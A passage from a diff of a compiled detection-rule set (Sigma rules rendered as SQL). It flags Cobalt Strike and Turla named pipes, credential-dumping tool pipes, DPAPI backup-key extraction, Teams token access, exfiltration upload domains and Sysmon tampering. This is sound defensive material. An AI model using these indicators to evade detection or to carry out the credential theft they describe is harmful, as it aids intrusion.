PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE 
'\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE 
'\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + 
"title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' 
ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName 
REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of 
Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE 
'%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": 